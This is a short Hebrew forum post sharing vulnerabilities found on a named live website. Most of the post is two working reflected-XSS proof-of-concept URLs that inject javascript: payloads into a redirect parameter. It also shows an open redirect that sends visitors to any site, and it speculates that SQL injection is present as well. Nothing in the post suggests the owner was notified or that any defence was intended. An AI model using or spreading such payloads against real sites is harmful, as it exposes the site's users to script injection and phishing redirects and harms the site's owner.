אוקיי
שתי XSS שחבר שלי גילה:
קוד:
http://top2kings.com/out.php?site=Shutd0wN&url=javascript:alert(%22Shutd0wN%22);
http://top2kings.com/out.php?site=Shutd0wN&url=javascript:document.write(%22Shutd0wN%22);
אני משער שיש עוד מלא מלא XSS..
אמ.. SQL INJECTION אני משער שיש גם
אהה ועוד דבר שאפשר לנצל אותו
http://top2kings.com/out.php?site=Sh...www.google.com
זה לא בודק לאן להעביר